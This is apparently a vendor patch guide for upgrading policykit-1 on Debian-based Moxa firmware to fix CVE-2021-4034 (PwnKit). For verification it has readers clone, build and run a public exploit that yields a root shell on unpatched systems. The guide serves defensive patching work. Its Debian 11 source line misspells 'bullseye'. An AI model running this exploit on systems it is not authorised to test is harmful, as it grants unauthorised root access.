For firmware using Debian or Moxa Industrial Linux (MIL), follow the steps below to upgrade the policykit-1 package to the latest version for CVE-2021-4034.
Step 1. Check if the Moxa Debian repository is in the apt source list.
Open moxa.source.list in the vi editor.
root@Linux:~$ sudo vi /etc/apt/sources.list.d/moxa.sources.list
Or
root@Linux:~$ sudo vi /etc/apt/sources.list
If it isn’t, add the following line to moxa.source.list,
For Debian 9.x,
deb http://deb.debian.com/debian stretch main contrib non-free
For Debian 10.x,
deb http://deb.debian.com/debian buster main contrib non-free
For Debian 11.x,
deb http://deb.debian.com/debian bulleyes main contrib non-free
Step 2. Update the latest apt information.
root@Linux:~$ apt-get update
Step 3. Install the latest policykit-1 package for CVE-2021-4034.
root@Linux:~$ apt-get install policykit-1
Step 4. Perform a test for this patch.
First, get the exploit script from github.
moxa@Linux:~/$ git clone https://github.com/berdav/CVE-2021-4034.git
Next, build the program.
moxa@Linux:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall cve-2021-4034.c -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /usr/bin/true GCONV_PATH=./pwnkit.so:.
Then, run the CVE-2021-4034 test program in the system that has not been patched. The test program will get the root privilege.
moxa@Linux:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
Note, if the system has already been patched, when you run the test program it will show this result.
moxa@Linux:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
--help |
--disable-internal-agent |
[--user username] PROGRAM [ARGUMENTS...]
See the pkexec manual page for more details.
Step 5. Those who can’t patch immediately should use the command below to remove the SUID-bit from pkexec:
root@Linux:~$ chmod 0755 /usr/bin/pkexec
|